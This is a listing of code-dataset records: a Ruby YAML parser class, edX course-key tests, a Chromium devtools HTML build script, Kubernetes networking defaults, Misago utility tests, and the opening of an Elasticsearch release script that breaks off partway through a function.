  # be used for things such as constructing a YAML AST or deserializing YAML
  # documents. It can even be fed back to Psych::Emitter to emit the same
  # document that was parsed.
  #
  # See Psych::Handler for documentation on the events that Psych::Parser emits.
  #
  # Here is an example that prints out every scalar found in a YAML document:
  #
  #   # Handler for detecting scalar values
  #   class ScalarHandler < Psych::Handler
  #     def scalar value, anchor, tag, plain, quoted, style
  #       puts value
  #     end
  #   end
  #
  #   parser = Psych::Parser.new(ScalarHandler.new)
  #   parser.parse(yaml_document)
  #
  # Here is an example that feeds the parser back in to Psych::Emitter. The
  # YAML document is read from STDIN and written back out to STDERR:
  #
  #   parser = Psych::Parser.new(Psych::Emitter.new($stderr))
  #   parser.parse($stdin)
  #
  # Psych uses Psych::Parser in combination with Psych::TreeBuilder to
  # construct an AST of the parsed YAML document.
  class Parser
    # Source-position record (byte index, line, column) reported by the
    # native parser for events and errors.
    class Mark < Struct.new(:index, :line, :column)
    end

    # The handler on which events will be called
    attr_accessor :handler

    # Set the encoding for this parser to +encoding+
    attr_writer :external_encoding

    ###
    # Creates a new Psych::Parser instance with +handler+. YAML events will
    # be called on +handler+. See Psych::Parser for more details.
    def initialize handler = Handler.new
      @handler = handler
      # ANY lets the underlying libyaml parser auto-detect the encoding.
      @external_encoding = ANY
    end

    ###
    # call-seq:
    #    parser.parse(yaml)
    #
    # Parse the YAML document contained in +yaml+.  Events will be called on
    # the handler set on the parser instance.
    #
    # See Psych::Parser and Psych::Parser#handler
    def parse yaml, path = yaml.respond_to?(:path) ? yaml.path : "<unknown>"
      # Parsing itself is implemented in the C extension (_native_parse);
      # +path+ is only used for error reporting.
      _native_parse @handler, yaml, path
    end
  end
end
|
ruby
|
github
|
https://github.com/ruby/ruby
|
ext/psych/lib/psych/parser.rb
|
"""
Tests of CourseKeys and CourseLocators
"""
import ddt
from bson.objectid import ObjectId
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import BlockUsageLocator, CourseLocator
from opaque_keys.edx.tests import LocatorBaseTest, TestDeprecated
@ddt.ddt
class TestCourseKeys(LocatorBaseTest, TestDeprecated):
    """
    Tests of :class:`.CourseKey` and :class:`.CourseLocator`

    NOTE: every ``assertEquals`` call was replaced with ``assertEqual``;
    ``assertEquals`` is a deprecated alias in :mod:`unittest`.
    """
    @ddt.data(
        "foo/bar/baz",
    )
    def test_deprecated_roundtrip(self, course_id):
        """Deprecated slash-separated course ids survive a parse/serialize round trip."""
        self.assertEqual(
            course_id,
            unicode(CourseKey.from_string(course_id))
        )

    @ddt.data(
        "foo!/bar/baz",
    )
    def test_invalid_chars_in_ssck_string(self, course_id):
        """Illegal characters in a slash-separated key must be rejected."""
        with self.assertRaises(InvalidKeyError):
            CourseKey.from_string(course_id)

    @ddt.data(
        "org/course/run/foo",
        "org/course",
        "org+course+run+foo",
        "org+course",
    )
    def test_invalid_format_location(self, course_id):
        """Keys with too many or too few parts must be rejected."""
        with self.assertRaises(InvalidKeyError):
            CourseLocator.from_string(course_id)

    def test_make_usage_key(self):
        """make_usage_key builds the same locator as constructing one directly."""
        depr_course = CourseKey.from_string('org/course/run')
        self.assertEqual(
            unicode(BlockUsageLocator(depr_course, 'category', 'name', deprecated=True)),
            unicode(depr_course.make_usage_key('category', 'name'))
        )
        course = CourseKey.from_string('course-v1:org+course+run')
        self.assertEqual(
            unicode(BlockUsageLocator(course, 'block_type', 'block_id')),
            unicode(course.make_usage_key('block_type', 'block_id'))
        )

    def test_convert_deprecation(self):
        """replace(deprecated=...) converts between old and new key formats."""
        depr_course = CourseKey.from_string('org/course/run')
        course = CourseKey.from_string('course-v1:org+course+run')
        self.assertEqual(unicode(depr_course.replace(deprecated=False)), unicode(course))
        self.assertEqual(unicode(course.replace(deprecated=True)), unicode(depr_course))

    def test_course_constructor_underspecified(self):
        """A locator needs either org/course/run or a version guid."""
        with self.assertRaises(InvalidKeyError):
            CourseLocator()
        with self.assertRaises(InvalidKeyError):
            CourseLocator(branch='published')

    def test_course_constructor_bad_version_guid(self):
        """version_guid must be a valid ObjectId, not a short string or None."""
        with self.assertRaises(ValueError):
            CourseLocator(version_guid="012345")
        with self.assertRaises(InvalidKeyError):
            CourseLocator(version_guid=None)

    def test_course_constructor_version_guid(self):
        """A version-only locator round-trips through string forms."""
        # generate a random location
        test_id_1 = ObjectId()
        test_id_1_loc = str(test_id_1)
        testobj_1 = CourseLocator(version_guid=test_id_1)
        self.check_course_locn_fields(testobj_1, version_guid=test_id_1)
        self.assertEqual(str(testobj_1.version_guid), test_id_1_loc)
        # Allow access to _to_string
        # pylint: disable=protected-access
        testobj_1_string = u'@'.join((testobj_1.VERSION_PREFIX, test_id_1_loc))
        self.assertEqual(testobj_1._to_string(), testobj_1_string)
        self.assertEqual(str(testobj_1), u'course-v1:' + testobj_1_string)
        self.assertEqual(testobj_1.html_id(), u'course-v1:' + testobj_1_string)
        self.assertEqual(testobj_1.version, test_id_1)

        # Test using a given string
        test_id_2_loc = '519665f6223ebd6980884f2b'
        test_id_2 = ObjectId(test_id_2_loc)
        testobj_2 = CourseLocator(version_guid=test_id_2)
        self.check_course_locn_fields(testobj_2, version_guid=test_id_2)
        self.assertEqual(str(testobj_2.version_guid), test_id_2_loc)
        # Allow access to _to_string
        # pylint: disable=protected-access
        testobj_2_string = u'@'.join((testobj_2.VERSION_PREFIX, test_id_2_loc))
        self.assertEqual(testobj_2._to_string(), testobj_2_string)
        self.assertEqual(str(testobj_2), u'course-v1:' + testobj_2_string)
        self.assertEqual(testobj_2.html_id(), u'course-v1:' + testobj_2_string)
        self.assertEqual(testobj_2.version, test_id_2)

    @ddt.data(
        ' mit.eecs',
        'mit.eecs ',
        CourseLocator.VERSION_PREFIX + '@mit.eecs',
        BlockUsageLocator.BLOCK_PREFIX + '@black+mit.eecs',
        'mit.ee cs',
        'mit.ee,cs',
        'mit.ee+cs',
        'mit.ee&cs',
        'mit.ee()cs',
        CourseLocator.BRANCH_PREFIX + '@this',
        'mit.eecs+' + CourseLocator.BRANCH_PREFIX,
        'mit.eecs+' + CourseLocator.BRANCH_PREFIX + '@this+' + CourseLocator.BRANCH_PREFIX + '@that',
        'mit.eecs+' + CourseLocator.BRANCH_PREFIX + '@this+' + CourseLocator.BRANCH_PREFIX,
        'mit.eecs+' + CourseLocator.BRANCH_PREFIX + '@this ',
        'mit.eecs+' + CourseLocator.BRANCH_PREFIX + '@th%is ',
    )
    def test_course_constructor_bad_package_id(self, bad_id):
        """
        Test all sorts of badly-formed package_ids (and urls with those package_ids)
        """
        with self.assertRaises(InvalidKeyError):
            CourseLocator(org=bad_id, course='test', run='2014_T2')

        with self.assertRaises(InvalidKeyError):
            CourseLocator(org='test', course=bad_id, run='2014_T2')

        with self.assertRaises(InvalidKeyError):
            CourseLocator(org='test', course='test', run=bad_id)

        with self.assertRaises(InvalidKeyError):
            CourseKey.from_string('course-v1:test+{}+2014_T2'.format(bad_id))

    @ddt.data(
        'course-v1:',
        'course-v1:/mit.eecs',
        'http:mit.eecs',
        'course-v1:mit+course+run{}@branch'.format(CourseLocator.BRANCH_PREFIX),
        'course-v1:mit+course+run+',
    )
    def test_course_constructor_bad_url(self, bad_url):
        """Malformed course-v1 URLs must be rejected."""
        with self.assertRaises(InvalidKeyError):
            CourseKey.from_string(bad_url)

    def test_course_constructor_url(self):
        # Test parsing a url when it starts with a version ID and there is also a block ID.
        # This hits the parsers parse_guid method.
        test_id_loc = '519665f6223ebd6980884f2b'
        testobj = CourseKey.from_string("course-v1:{}@{}+{}@hw3".format(
            CourseLocator.VERSION_PREFIX, test_id_loc, CourseLocator.BLOCK_PREFIX
        ))
        self.check_course_locn_fields(
            testobj,
            version_guid=ObjectId(test_id_loc)
        )

    def test_course_constructor_url_package_id_and_version_guid(self):
        """A key carrying both org/course/run and a version guid parses fully."""
        test_id_loc = '519665f6223ebd6980884f2b'
        testobj = CourseKey.from_string(
            'course-v1:mit.eecs+honors.6002x+2014_T2+{}@{}'.format(CourseLocator.VERSION_PREFIX, test_id_loc)
        )
        self.check_course_locn_fields(
            testobj,
            org='mit.eecs',
            course='honors.6002x',
            run='2014_T2',
            version_guid=ObjectId(test_id_loc)
        )

    def test_course_constructor_url_package_id_branch_and_version_guid(self):
        """A key carrying org/course/run, branch AND version guid parses fully."""
        test_id_loc = '519665f6223ebd6980884f2b'
        org = 'mit.eecs'
        course = '~6002x'
        run = '2014_T2'
        testobj = CourseKey.from_string('course-v1:{}+{}+{}+{}@draft-1+{}@{}'.format(
            org, course, run, CourseLocator.BRANCH_PREFIX, CourseLocator.VERSION_PREFIX, test_id_loc
        ))
        self.check_course_locn_fields(
            testobj,
            org=org,
            course=course,
            run=run,
            branch='draft-1',
            version_guid=ObjectId(test_id_loc)
        )

    def test_course_constructor_package_id_no_branch(self):
        """Serialization of an org/course/run locator omits the branch part."""
        org = 'mit.eecs'
        course = '6002x'
        run = '2014_T2'
        testurn = '{}+{}+{}'.format(org, course, run)
        testobj = CourseLocator(org=org, course=course, run=run)
        self.check_course_locn_fields(testobj, org=org, course=course, run=run)
        # Allow access to _to_string
        # pylint: disable=protected-access
        self.assertEqual(testobj._to_string(), testurn)

    def test_course_constructor_package_id_separate_branch(self):
        """A branch passed separately is serialized with the branch prefix."""
        org = 'mit.eecs'
        course = '6002x'
        run = '2014_T2'
        test_branch = 'published'
        expected_urn = '{}+{}+{}+{}@{}'.format(org, course, run, CourseLocator.BRANCH_PREFIX, test_branch)
        testobj = CourseLocator(org=org, course=course, run=run, branch=test_branch)
        self.check_course_locn_fields(
            testobj,
            org=org,
            course=course,
            run=run,
            branch=test_branch,
        )
        self.assertEqual(testobj.branch, test_branch)
        # Allow access to _to_string
        # pylint: disable=protected-access
        self.assertEqual(testobj._to_string(), expected_urn)

    def test_course_constructor_deprecated_offering(self):
        """The deprecated 'offering' kwarg still works but warns."""
        org = 'mit.eecs'
        course = '6002x'
        run = '2014_T2'
        offering = '{}/{}'.format(course, run)
        test_branch = 'published'
        with self.assertDeprecationWarning(count=2):
            testobj = CourseLocator(org=org, offering=offering, branch=test_branch)
            with self.assertRaises(InvalidKeyError):
                CourseLocator(org=org, offering='', branch=test_branch)
            with self.assertRaises(InvalidKeyError):
                CourseLocator(org=org, offering=course, branch=test_branch)
        self.check_course_locn_fields(
            testobj,
            org=org,
            course=course,
            run=run,
            branch=test_branch,
        )

    @ddt.data(
        "i4x://org/course/category/name",
        "i4x://org/course/category/name@revision"
    )
    def test_make_usage_key_from_deprecated_string_roundtrip(self, url):
        """Deprecated i4x usage keys survive a parse/serialize round trip."""
        course_key = CourseLocator('org', 'course', 'run')
        with self.assertDeprecationWarning(count=2):
            self.assertEqual(
                url,
                course_key.make_usage_key_from_deprecated_string(url).to_deprecated_string()
            )

    def test_empty_run(self):
        """An empty run is invalid for new-style keys, allowed when deprecated."""
        with self.assertRaises(InvalidKeyError):
            CourseLocator('org', 'course', '')

        self.assertEqual(
            'org/course/',
            unicode(CourseLocator('org', 'course', '', deprecated=True))
        )
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
#
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os.path
import sys
def generate_include_tag(resource_path):
    """Return the HTML include tag for a .js or .css resource.

    Only the file name (not its directory) ends up in the emitted tag.
    Raises ValueError for any other extension; the original version fell
    through a bare ``assert`` (stripped under -O) and silently returned
    None, which would have written "None" into the output HTML.
    """
    (dir_name, file_name) = os.path.split(resource_path)
    if file_name.endswith('.js'):
        return ' <script type="text/javascript" src="%s"></script>\n' % file_name
    elif file_name.endswith('.css'):
        return ' <link rel="stylesheet" type="text/css" href="%s">\n' % file_name
    raise ValueError('unsupported resource type: %s' % resource_path)
def write_devtools_html(inspector_file, devtools_file, debug):
    """Copy inspector HTML into devtools HTML, rewriting resource includes.

    In release mode (debug false) every individual <script>/<link> line is
    dropped and replaced by the two concatenated bundles injected just
    before </head>. In both modes buildSystemOnly.js is injected right
    after <head>.
    """
    for line in inspector_file:
        if not debug:
            # Strip per-file includes; the bundles below replace them.
            if '<script ' in line or '<link ' in line:
                continue
            if '</head>' in line:
                devtools_file.write(generate_include_tag("inspector.css"))
                devtools_file.write(generate_include_tag("Main.js"))
        devtools_file.write(line)
        if '<head>' in line:
            devtools_file.write(generate_include_tag("buildSystemOnly.js"))
def main(argv):
    """Generate devtools HTML from inspector HTML.

    argv: [script_name, inspector_html_path, devtools_html_path, debug_flag]
    where debug_flag '0' selects release mode. Returns 1 on usage error.
    """
    if len(argv) < 4:
        print('usage: %s inspector_html devtools_html debug' % argv[0])
        return 1
    # The first argument is ignored. We put 'web.gyp' in the inputs list
    # for this script, so every time the list of script gets changed, our html
    # file is rebuilt.
    inspector_html_name = argv[1]
    devtools_html_name = argv[2]
    debug = argv[3] != '0'
    # 'with' guarantees both handles are closed even if the rewrite raises;
    # the original leaked the handles on error.
    with open(inspector_html_name, 'r') as inspector_html:
        with open(devtools_html_name, 'w') as devtools_html:
            write_devtools_html(inspector_html, devtools_html, debug)
    # Touch output file directory to make sure that Xcode will copy
    # modified resource files.
    if sys.platform == 'darwin':
        output_dir_name = os.path.dirname(devtools_html_name)
        os.utime(output_dir_name, None)


if __name__ == '__main__':
    sys.exit(main(sys.argv))
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package v1
import (
v1 "k8s.io/api/core/v1"
networkingv1 "k8s.io/api/networking/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/utils/ptr"
)
// addDefaultingFuncs registers this package's generated defaulting
// functions with the given scheme.
func addDefaultingFuncs(scheme *runtime.Scheme) error {
	return RegisterDefaults(scheme)
}
// SetDefaults_NetworkPolicyPort defaults an unset Protocol to TCP.
func SetDefaults_NetworkPolicyPort(obj *networkingv1.NetworkPolicyPort) {
	// Default any undefined Protocol fields to TCP.
	if obj.Protocol == nil {
		proto := v1.ProtocolTCP
		obj.Protocol = &proto
	}
}
// SetDefaults_NetworkPolicy fills in Spec.PolicyTypes when the policy left
// it empty: Ingress is always implied, and Egress is added only when
// egress rules are present.
func SetDefaults_NetworkPolicy(obj *networkingv1.NetworkPolicy) {
	if len(obj.Spec.PolicyTypes) == 0 {
		// Any policy that does not specify policyTypes implies at least "Ingress".
		obj.Spec.PolicyTypes = []networkingv1.PolicyType{networkingv1.PolicyTypeIngress}
		if len(obj.Spec.Egress) != 0 {
			obj.Spec.PolicyTypes = append(obj.Spec.PolicyTypes, networkingv1.PolicyTypeEgress)
		}
	}
}
// SetDefaults_IngressClass defaults the parameters' Scope to "Cluster"
// when parameters are set but no scope was specified.
func SetDefaults_IngressClass(obj *networkingv1.IngressClass) {
	if obj.Spec.Parameters != nil && obj.Spec.Parameters.Scope == nil {
		obj.Spec.Parameters.Scope = ptr.To(networkingv1.IngressClassParametersReferenceScopeCluster)
	}
}
|
go
|
github
|
https://github.com/kubernetes/kubernetes
|
pkg/apis/networking/v1/defaults.go
|
#-*- coding: utf-8 -*-
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.test.client import RequestFactory
from django.utils import timezone
from misago.core.utils import (clean_return_path, is_request_to_misago,
slugify, is_referer_local,
format_plaintext_for_html)
# Request paths that should (VALID) and should not (INVALID) be recognized
# as belonging to the Misago URL space by is_request_to_misago.
VALID_PATHS = (
    "/",
    "/threads/",
)

INVALID_PATHS = (
    "",
    "somewhere/",
)
class IsRequestToMisagoTests(TestCase):
    def test_is_request_to_misago(self):
        """
        is_request_to_misago correctly detects requests directed at Misago
        """
        misago_prefix = reverse('misago:index')

        for path in VALID_PATHS:
            # Build a bare request and override just the resolved path.
            request = RequestFactory().get('/')
            request.path_info = path
            self.assertTrue(
                is_request_to_misago(request),
                '"%s" is not overlapped by "%s"' % (path, misago_prefix))

        for path in INVALID_PATHS:
            request = RequestFactory().get('/')
            request.path_info = path
            self.assertFalse(
                is_request_to_misago(request),
                '"%s" is overlapped by "%s"' % (path, misago_prefix))
class SlugifyTests(TestCase):
    def test_valid_slugify_output(self):
        """Misago's slugify correctly slugifies string"""
        # (input, expected slug) pairs; covers case folding, spaces,
        # punctuation stripping and unicode transliteration.
        test_cases = (
            (u'Bob', u'bob'),
            (u'Eric The Fish', u'eric-the-fish'),
            (u'John Snow', u'john-snow'),
            (u'J0n', u'j0n'),
            (u'An###ne', u'anne'),
            (u'S**t', u'st'),
            (u'Łók', u'lok'),
        )

        for original, slug in test_cases:
            self.assertEqual(slugify(original), slug)
# (plaintext input, expected HTML output) pairs for
# format_plaintext_for_html: paragraphs, line breaks and URL linking.
PLAINTEXT_FORMAT_CASES = (
    (
        u'Lorem ipsum.',
        u'<p>Lorem ipsum.</p>'
    ),
    (
        u'Lorem <b>ipsum</b>.',
        u'<p>Lorem <b>ipsum</b>.</p>'
    ),
    (
        u'Lorem "ipsum" dolor met.',
        u'<p>Lorem "ipsum" dolor met.</p>'
    ),
    (
        u'Lorem ipsum.\nDolor met.',
        u'<p>Lorem ipsum.<br />Dolor met.</p>'
    ),
    (
        u'Lorem ipsum.\n\nDolor met.',
        u'<p>Lorem ipsum.</p>\n\n<p>Dolor met.</p>'
    ),
    (
        u'http://misago-project.org/login/',
        u'<p><a href="http://misago-project.org/login/">http://misago-project.org/login/</a></p>'
    ),
)
class FormatPlaintextForHtmlTests(TestCase):
    def test_format_plaintext_for_html(self):
        """format_plaintext_for_html correctly formats plaintext for html"""
        for plaintext, html in PLAINTEXT_FORMAT_CASES:
            output = format_plaintext_for_html(plaintext)
            assertion_message = """
format_plaintext_for_html failed to produce expected output:
expected: %s
return: %s
""" % (html, output)
            self.assertEqual(output, html, assertion_message)
class MockRequest(object):
    """Minimal stand-in for a Django request, used by the tests below.

    Carries only the attributes clean_return_path / is_referer_local read:
    scheme, method, META and POST.
    """

    scheme = 'http'

    def __init__(self, method, meta=None, post=None):
        self.method = method
        self.META = {} if meta is None else meta
        self.POST = {} if post is None else post
class CleanReturnPathTests(TestCase):
    def test_get_request(self):
        """clean_return_path works for GET requests"""
        # Foreign referer host: must be rejected.
        bad_request = MockRequest('GET', {
            'HTTP_REFERER': 'http://cookies.com',
            'HTTP_HOST': 'misago-project.org'
        })
        self.assertIsNone(clean_return_path(bad_request))

        # Scheme mismatch (https referer, http request): rejected.
        bad_request = MockRequest('GET', {
            'HTTP_REFERER': 'https://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/'
        })
        self.assertIsNone(clean_return_path(bad_request))

        bad_request = MockRequest('GET', {
            'HTTP_REFERER': 'https://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/assadsa/'
        })
        self.assertIsNone(clean_return_path(bad_request))

        # Matching scheme and host: the referer's path is returned.
        ok_request = MockRequest('GET', {
            'HTTP_REFERER': 'http://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/'
        })
        self.assertEqual(clean_return_path(ok_request), '/')

        ok_request = MockRequest('GET', {
            'HTTP_REFERER': 'http://misago-project.org/login/',
            'HTTP_HOST': 'misago-project.org/'
        })
        self.assertEqual(clean_return_path(ok_request), '/login/')

    def test_post_request(self):
        """clean_return_path works for POST requests"""
        # POSTed return_path must match the referer path, not just the host.
        bad_request = MockRequest('POST', {
            'HTTP_REFERER': 'http://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/'
        }, {'return_path': '/sdasdsa/'})
        self.assertIsNone(clean_return_path(bad_request))

        ok_request = MockRequest('POST', {
            'HTTP_REFERER': 'http://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/'
        }, {'return_path': '/login/'})
        self.assertEqual(clean_return_path(ok_request), '/login/')
class IsRefererLocalTests(TestCase):
    def test_local_referers(self):
        """local referers return true"""
        ok_request = MockRequest('GET', {
            'HTTP_REFERER': 'http://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/'
        })
        self.assertTrue(is_referer_local(ok_request))

        ok_request = MockRequest('GET', {
            'HTTP_REFERER': 'http://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/'
        })
        self.assertTrue(is_referer_local(ok_request))

        ok_request = MockRequest('GET', {
            'HTTP_REFERER': 'http://misago-project.org/login/',
            'HTTP_HOST': 'misago-project.org/'
        })
        self.assertTrue(is_referer_local(ok_request))

    def test_foreign_referers(self):
        """non-local referers return false"""
        # Different host.
        bad_request = MockRequest('GET', {
            'HTTP_REFERER': 'http://else-project.org/',
            'HTTP_HOST': 'misago-project.org/'
        })
        self.assertFalse(is_referer_local(bad_request))

        # Scheme mismatch (request scheme is http, referer is https).
        bad_request = MockRequest('GET', {
            'HTTP_REFERER': 'https://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/'
        })
        self.assertFalse(is_referer_local(bad_request))

        # Host with extra path component does not match the referer host.
        bad_request = MockRequest('GET', {
            'HTTP_REFERER': 'http://misago-project.org/',
            'HTTP_HOST': 'misago-project.org/assadsa/'
        })
        self.assertFalse(is_referer_local(bad_request))
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import re
import tempfile
import shutil
import os
import datetime
import json
import time
import sys
import argparse
import hmac
import urllib
import fnmatch
import socket
import urllib.request
import subprocess
from functools import partial
from http.client import HTTPConnection
from http.client import HTTPSConnection
"""
This tool builds a release from the a given elasticsearch branch.
In order to execute it go in the top level directory and run:
$ python3 dev_tools/build_release.py --branch 0.90 --publish --remote origin
By default this script runs in 'dry' mode which essentially simulates a release. If the
'--publish' option is set the actual release is done. The script takes over almost all
steps necessary for a release from a high level point of view it does the following things:
- run prerequisit checks ie. check for Java 1.7 being presend or S3 credentials available as env variables
- detect the version to release from the specified branch (--branch) or the current branch
- creates a release branch & updates pom.xml and Version.java to point to a release version rather than a snapshot
- builds the artifacts and runs smoke-tests on the build zip & tar.gz files
- commits the new version and merges the release branch into the source branch
- creates a tag and pushes the commit to the specified origin (--remote)
- publishes the releases to Sonatype and S3
Once it's done it will print all the remaining steps.
Prerequisites:
- Python 3k for script execution
- Boto for S3 Upload ($ apt-get install python-boto)
- RPM for RPM building ($ apt-get install rpm)
- S3 keys exported via ENV variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
- GPG data exported via ENV variables (GPG_KEY_ID, GPG_PASSPHRASE, optionally GPG_KEYRING)
- S3 target repository via ENV variables (S3_BUCKET_SYNC_TO, optionally S3_BUCKET_SYNC_FROM)
"""
env = os.environ

# (plugin name, github repo/path) pairs referenced by the release process.
PLUGINS = [('license', 'elasticsearch/license/latest'),
           ('bigdesk', 'lukas-vlcek/bigdesk'),
           ('paramedic', 'karmi/elasticsearch-paramedic'),
           ('segmentspy', 'polyfractal/elasticsearch-segmentspy'),
           ('inquisitor', 'polyfractal/elasticsearch-inquisitor'),
           ('head', 'mobz/elasticsearch-head')]

# All command output is appended to this log file.
LOG = env.get('ES_RELEASE_LOG', '/tmp/elasticsearch_release.log')

# console colors
COLOR_OK = '\033[92m'
COLOR_END = '\033[0m'
COLOR_FAIL = '\033[91m'
def log(msg):
    """Append msg to the release log, prefixed with a newline."""
    log_plain('\n%s' % msg)
def log_plain(msg):
    """Append msg to the release log file (LOG) as UTF-8 bytes.

    Uses a 'with' block so the handle is closed even if the write raises;
    the original open/close pair leaked the handle on error.
    """
    with open(LOG, mode='ab') as f:
        f.write(msg.encode('utf-8'))
def run(command, quiet=False):
    """Run a shell command, appending its stdout+stderr to LOG.

    Raises RuntimeError when the command exits non-zero; set quiet=True to
    suppress printing the failure message before raising.
    """
    log('%s: RUN: %s\n' % (datetime.datetime.now(), command))
    # os.system returns non-zero on failure, which is truthy here.
    if os.system('%s >> %s 2>&1' % (command, LOG)):
        msg = ' FAILED: %s [see log %s]' % (command, LOG)
        if not quiet:
            print(msg)
        raise RuntimeError(msg)
# Fail fast at import time if JAVA_HOME isn't exported; the build needs it.
try:
    JAVA_HOME = env['JAVA_HOME']
except KeyError:
    raise RuntimeError("""
Please set JAVA_HOME in the env before running release tool
On OSX use: export JAVA_HOME=`/usr/libexec/java_home -v '1.7*'`""")

# Prefer an explicit JAVA7_HOME when one is set.
try:
    JAVA_HOME = env['JAVA7_HOME']
except KeyError:
    pass  # no JAVA7_HOME - we rely on JAVA_HOME

try:
    # make sure mvn3 is used if mvn3 is available
    # some systems use maven 2 as default
    subprocess.check_output('mvn3 --version', shell=True, stderr=subprocess.STDOUT)
    MVN = 'mvn3'
except subprocess.CalledProcessError:
    MVN = 'mvn'
def java_exe():
    """Return a shell snippet exporting JAVA_HOME, PATH and JAVACMD.

    Prepended to build commands so they all run against the same JDK.
    """
    home = JAVA_HOME
    return 'export JAVA_HOME="{0}" PATH="{0}/bin:$PATH" JAVACMD="{0}/bin/java"'.format(home)
def verify_java_version(version):
    """Raise RuntimeError unless `java -version` reports the given version prefix."""
    s = os.popen('%s; java -version 2>&1' % java_exe()).read()
    if ' version "%s.' % version not in s:
        raise RuntimeError('got wrong version for java %s:\n%s' % (version, s))

# Verifies the java version. We guarantee that we run with Java 1.7
# If 1.7 is not available fail the build!
def verify_mvn_java_version(version, mvn):
    """Raise RuntimeError unless the given maven binary runs on the expected Java."""
    s = os.popen('%s; %s --version 2>&1' % (java_exe(), mvn)).read()
    if 'Java version: %s' % version not in s:
        raise RuntimeError('got wrong java version for %s %s:\n%s' % (mvn, version, s))
# Returns the hash of the current git HEAD revision
def get_head_hash():
    """Return the full SHA of HEAD (stripped stdout of git rev-parse)."""
    return os.popen(' git rev-parse --verify HEAD 2>&1').read().strip()

# Returns the hash of the given tag revision
def get_tag_hash(tag):
    """Return the SHA the given tag points at."""
    return os.popen('git show-ref --tags %s --hash 2>&1' % (tag)).read().strip()

# Returns the name of the current branch
def get_current_branch():
    """Return the name of the currently checked-out branch."""
    return os.popen('git rev-parse --abbrev-ref HEAD 2>&1').read().strip()
# Utility that returns the name of the release branch for a given version
def release_branch(version):
    """Return the conventional release-branch name for *version*."""
    return 'release_branch_{}'.format(version)
# runs git fetch on the given remote
def fetch(remote):
    """Fetch the given remote; output goes to LOG via run()."""
    run('git fetch %s' % remote)
# Creates a new release branch from the given source branch
# and rebases the source branch from the remote before creating
# the release branch. Note: This fails if the source branch
# doesn't exist on the provided remote.
def create_release_branch(remote, src_branch, release):
    """Check out src_branch, rebase it on remote, and branch off for the release."""
    run('git checkout %s' % src_branch)
    run('git pull --rebase %s %s' % (remote, src_branch))
    run('git checkout -b %s' % (release_branch(release)))
# Reads the given file and applies the
# callback to it. If the callback changed
# a line the given file is replaced with
# the modified input.
def process_file(file_path, line_callback):
    """Apply line_callback to every line of file_path.

    If any line changed, replace the file with the rewritten copy and
    return True; otherwise discard the temp copy and return False.
    """
    fh, abs_path = tempfile.mkstemp()
    modified = False
    # Wrap the mkstemp fd directly instead of opening abs_path a second
    # time: the original kept the raw fd open alongside a separate handle
    # and leaked it if writing raised before os.close(fh).
    with os.fdopen(fh, 'w', encoding='utf-8') as new_file:
        with open(file_path, encoding='utf-8') as old_file:
            for line in old_file:
                new_line = line_callback(line)
                modified = modified or (new_line != line)
                new_file.write(new_line)
    if modified:
        # Replace original file with the rewritten copy.
        os.remove(file_path)
        shutil.move(abs_path, file_path)
        return True
    # nothing to do - just remove the tmp file
    os.remove(abs_path)
    return False
# Walks the given directory path (defaults to 'docs')
# and replaces all 'coming[$version]' tags with
# 'added[$version]'. This method only accesses asciidoc files.
def update_reference_docs(release_version, path='docs'):
    """Return the list of asciidoc files that were rewritten."""
    pattern = 'coming[%s' % (release_version)
